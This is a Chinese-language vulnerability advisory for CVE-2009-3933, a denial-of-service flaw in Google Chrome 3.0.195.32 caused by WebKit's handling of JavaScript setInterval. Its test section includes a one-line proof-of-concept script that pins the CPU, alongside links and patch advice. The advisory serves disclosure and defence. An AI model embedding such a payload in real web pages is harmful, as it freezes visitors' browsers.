Google Chrome setInterval方式调用拒绝服务漏洞
Google Chrome setInterval方式调用拒绝服务漏洞
发布日期:2009-11-13
更新日期:2009-11-16
受影响系统:
Google Chrome 3.0.195.32
描述:
--------------------------------------------------------------------------------
CVE ID: CVE-2009-3933
Google Chrome是Google发布的开源WEB浏览器。
Chrome所使用的WebKit没有正确地处理JavaScript setInterval方式的调用,特制网页可以触发WTF::currentTime与base::Time函数之间的不兼容,耗尽100%的CPU资源。
<*来源:James Robinson (jamesr@chromium.org)
链接:https://bugs.webkit.org/show_bug.cgi?format=multiple&id=30833
http://en.securitylab.ru/bitrix/redirect.php?event3=387654&goto=http%3A%2F%2Fcode.google.com%2Fp%2Fchromium%2Fissues%2Fdetail%3Fid%3D25892
http://googlechromereleases.blogspot.com/2009/11/stable-channel-update.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<script>
setInterval(function() {}, 0);
</script>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Google
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.google.com
评论暂时关闭